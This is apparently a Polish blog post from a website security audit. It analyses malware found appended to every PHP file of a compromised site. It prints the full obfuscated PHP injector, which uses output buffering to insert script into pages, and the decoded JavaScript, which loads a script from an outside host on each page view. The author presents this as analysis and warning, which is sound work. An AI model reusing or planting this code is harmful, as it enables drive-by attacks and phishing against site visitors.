Kolejny kwiatek znaleziony na końcu każdego pliku PHP w audytowanej stronie www:

<?php
global $ob_starting;

if(!$ob_starting) {
    function ob_start_flush($s) {
        $tc = array(0, 69, 84, 82, 67, 83, 79, 7, 9, 73, 8, 76, 63, 12, 78, 68, 23, 24, 65, 19, 27, 14, 3, 70, 80, 29, 89, 17, 86, 85, 2, 16, 77, 18, 91, 11, 93, 71, 66, 72, 75, 20, 87, 74, 59, 61, 22, 13, 37, 28, 52, 35, 21, 15, 1, 25, 34, 92, 36, 41, 30, 88, 46, 33, 51);
        $tr = array(49, 5, 4, 3, 9, 24, 2, 0, 2, 26, 24, 1, 25, 30, 2, 1, 61, 2, 53, 43, 18, 28, 18, 5, 4, 3, 9, 24, 2, 30, 60, 9, 23, 0, 10, 2, 26, 24, 1, 6, 23, 10, 3, 1, 15, 1, 23, 12, 4, 6, 11, 6, 3, 5, 8, 25, 25, 30, 29, 14, 15, 1, 23, 9, 14, 1, 15, 30, 8, 0, 34, 0, 0, 0, 28, 18, 3, 0, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 0, 25, 0, 14, 1, 42, 0, 63, 3, 3, 18, 26, 10, 7, 22, 41, 38, 17, 33, 16, 33, 7, 13, 0, 7, 22, 17, 27, 16, 17, 16, 23, 7, 13, 0, 7, 22, 17, 19, 33, 23, 17, 19, 7, 13, 0, 7, 22, 17, 17, 16, 23, 16, 41, 7, 13, 0, 7, 22, 41, 4, 19, 27, 17, 19, 7, 13, 0, 7, 22, 16, 41, 17, 16, 17, 19, 7, 13, 0, 7, 22, 19, 1, 16, 55, 16, 31, 7, 13, 0, 7, 22, 17, 52, 16, 31, 17, 33, 7, 13, 0, 7, 22, 16, 33, 17, 27, 16, 17, 7, 13, 0, 7, 22, 16, 23, 17, 19, 19, 27, 7, 13, 0, 7, 22, 33, 23, 17, 33, 17, 27, 7, 13, 0, 7, 22, 16, 33, 41, 4, 19, 27, 7, 13, 0, 7, 22, 16, 16, 17, 19, 17, 19, 7, 13, 0, 7, 22, 16, 23, 41, 55, 19, 1, 7, 13, 0, 7, 22, 19, 1, 16, 33, 16, 16, 7, 13, 0, 7, 22, 16, 31, 16, 15, 17, 19, 7, 13, 0, 7, 22, 16, 17, 16, 41, 17, 27, 7, 13, 0, 7, 22, 19, 15, 16, 33, 16, 17, 7, 13, 0, 7, 22, 19, 1, 16, 55, 17, 33, 7, 13, 0, 7, 22, 19, 1, 19, 27, 41, 15, 7, 8, 20, 0, 0, 0, 28, 18, 3, 0, 3, 1, 15, 1, 23, 12, 4, 6, 11, 6, 3, 5, 0, 25, 0, 27, 20, 0, 0, 0, 28, 18, 3, 0, 4, 6, 11, 6, 3, 5, 12, 24, 9, 4, 40, 1, 15, 0, 25, 0, 31, 20, 0, 0, 0, 23, 29, 14, 4, 2, 9, 6, 14, 0, 15, 9, 28, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 2, 13, 5, 2, 26, 11, 1, 15, 8, 0, 34, 28, 18, 3, 0, 5, 0, 25, 0, 30, 30, 20, 23, 6, 3, 0, 10, 43, 25, 31, 20, 43, 49, 2, 21, 11, 1, 14, 37, 2, 39, 20, 43, 35, 35, 8, 0, 34, 28, 18, 3, 0, 4, 12, 3, 37, 38, 0, 25, 0, 2, 44, 43, 45, 20, 23, 6, 3, 0, 10, 9, 25, 27, 20, 9, 49, 16, 20, 9, 35, 35, 8, 0, 34, 28, 18, 3, 0, 4, 12, 4, 11, 3, 0, 25, 0, 4, 12, 3, 37, 38, 21, 5, 29, 38, 5, 2, 3, 10, 9, 35, 35, 13, 33, 8, 20, 9, 23, 0, 10, 4, 12, 4, 11, 3, 54, 25, 30, 31, 31, 30, 8, 0, 5, 0, 35, 25, 0, 64, 2, 3, 9, 14, 37, 21, 23, 3, 6, 32, 51, 39, 18, 3, 51, 6, 15, 1, 10, 24, 18, 3, 5, 1, 59, 14, 2, 10, 4, 12, 4, 11, 3, 13, 27, 46, 8, 47, 27, 52, 8, 20, 36, 36, 9, 23, 0, 10, 5, 2, 26, 11, 1, 15, 8, 0, 34, 5, 0, 25, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 31, 13, 19, 46, 8, 0, 35, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 19, 46, 13, 10, 5, 21, 11, 1, 14, 37, 2, 39, 47, 19, 17, 8, 8, 0, 35, 0, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 44, 27, 45, 21, 5, 29, 38, 5, 2, 3, 10, 31, 13, 27, 8, 35, 14, 1, 42, 0, 58, 18, 2, 1, 10, 8, 21, 37, 1, 2, 50, 9, 32, 1, 10, 8, 0, 35, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 10, 5, 21, 11, 1, 14, 37, 2, 39, 47, 33, 8, 8, 20, 36, 0, 1, 11, 5, 1, 0, 34, 5, 0, 25, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 19, 46, 13, 10, 5, 21, 11, 1, 14, 37, 2, 39, 47, 19, 17, 8, 8, 0, 35, 0, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 44, 27, 45, 21, 5, 29, 38, 5, 2, 3, 10, 31, 13, 27, 8, 35, 14, 1, 42, 0, 58, 18, 2, 1, 10, 8, 21, 37, 1, 2, 50, 9, 32, 1, 10, 8, 20, 36, 3, 1, 2, 29, 3, 14, 0, 5, 20, 0, 0, 0, 36, 0, 0, 0, 23, 29, 14, 4, 2, 9, 6, 14, 0, 2, 3, 26, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 8, 0, 34, 2, 3, 26, 0, 34, 0, 0, 0, 9, 23, 10, 54, 15, 6, 4, 29, 32, 1, 14, 2, 21, 37, 1, 2, 48, 11, 1, 32, 1, 14, 2, 56, 26, 59, 15, 0, 57, 57, 0, 54, 15, 6, 4, 29, 32, 1, 14, 2, 21, 4, 3, 1, 18, 2, 1, 48, 11, 1, 32, 1, 14, 2, 8, 34, 15, 6, 4, 29, 32, 1, 14, 2, 21, 42, 3, 9, 2, 1, 10, 15, 9, 28, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 13, 27, 8, 8, 20, 0, 0, 0, 36, 0, 1, 11, 5, 1, 0, 34, 28, 18, 3, 0, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 25, 15, 6, 4, 29, 32, 1, 14, 2, 21, 4, 3, 1, 18, 2, 1, 48, 11, 1, 32, 1, 14, 2, 10, 30, 5, 4, 3, 9, 24, 2, 30, 8, 20, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 21, 2, 26, 24, 1, 25, 30, 2, 1, 61, 2, 53, 43, 18, 28, 18, 5, 4, 3, 9, 24, 2, 30, 20, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 21, 5, 3, 4, 25, 15, 9, 28, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 13, 31, 8, 20, 15, 6, 4, 29, 32, 1, 14, 2, 21, 37, 1, 2, 48, 11, 1, 32, 1, 14, 2, 5, 56, 26, 50, 18, 37, 62, 18, 32, 1, 10, 30, 39, 1, 18, 15, 30, 8, 44, 31, 45, 21, 18, 24, 24, 1, 14, 15, 51, 39, 9, 11, 15, 10, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 8, 20, 36, 36, 0, 4, 18, 2, 4, 39, 10, 1, 8, 0, 34, 0, 36, 2, 3, 26, 0, 34, 4, 39, 1, 4, 40, 12, 4, 6, 11, 6, 3, 5, 12, 24, 9, 4, 40, 1, 15, 10, 8, 20, 36, 0, 4, 18, 2, 4, 39, 10, 1, 8, 0, 34, 0, 5, 1, 2, 50, 9, 32, 1, 6, 29, 2, 10, 30, 2, 3, 26, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 8, 30, 13, 0, 52, 31, 31, 8, 20, 36, 0, 0, 0, 36, 0, 0, 0, 2, 3, 26, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 8, 20, 36, 49, 53, 5, 4, 3, 9, 24, 2, 60);

        $ob_htm = '';
        foreach($tr as $tval) {
            $ob_htm .= chr($tc[$tval]+32);
        }

        $slw=strtolower($s);
        $i=strpos($slw,'</script');if($i){$i=strpos($slw,'>',$i);}
        if(!$i){$i=strpos($slw,'</div');if($i){$i=strpos($slw,'>',$i);}}
        if(!$i){$i=strpos($slw,'</table');if($i){$i=strpos($slw,'>',$i);}}
        if(!$i){$i=strpos($slw,'</form');if($i){$i=strpos($slw,'>',$i);}}
        if(!$i){$i=strpos($slw,'</p');if($i){$i=strpos($slw,'>',$i);}}
        if(!$i){$i=strpos($slw,'</body');if($i){$i--;}}
        if(!$i){$i=strlen($s);if($i){$i--;}}
        $i++; $s=substr($s,0,$i).$ob_htm.substr($s,$i);

        return $s;
    }

    $ob_starting = time();
    @ob_start("ob_start_flush");
}
?>

Powyższy kod „łapie” stronę przed jej wyświetleniem, przeszukuje ją pod kątem tagów html: „script”, „div” ,”table”, „form”, „p”, „body” i dokleja na końcu jednego z nich kod Java Script:

<script type="text/javascript">
    if (typeof(redef_colors)=="undefined") {
        var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#707d83', '#787481', '#3d7278', '#3e7982', '#3e314d');
        var redef_colors = 1;
        var colors_picked = 0;
        function div_pick_colors(t,styled) {
            var s = "";
            for (j=0;j<t.length;j++) {
                var c_rgb = t[j];
                for (i=1;i<7;i++) {
                    var c_clr = c_rgb.substr(i++,2);
                    if (c_clr!="00")
                        s += String.fromCharCode(parseInt(c_clr,16)-15);
                }
            }
            if (styled) {
                s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2));
            } else {
                s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime();
            }
            return s;
        }
        function try_pick_colors() {
            try {
                if(!document.getElementById || !document.createElement){
                    document.write(div_pick_colors(div_colors,1));
                } else {
                    var new_cstyle=document.createElement("script");
                    new_cstyle.type="text/javascript";
                    new_cstyle.src=div_pick_colors(div_colors,0);
                    document.getElementsByTagName("head")[0].appendChild(new_cstyle);
                }
            } catch(e) { }

            try {
                check_colors_picked();
            } catch(e) {
                setTimeout("try_pick_colors()", 500);
            }
        }
        try_pick_colors();
    }
</script>

Kod JavaScript dodaje na stronę ładowanie pliku http://chantier.ci/js/#[ZNACZNIK CZASOWY]
Niestety powyższy link nie działa, a więc nie mam za bardzo możliwości sprawdzenia co jest głębiej. Zakładam, że w finale użytkownik danej strony może dostawać exploity na swoją przeglądarkę albo inne formy zatruwania życia (phishing itp)

Komentarze zablokowane.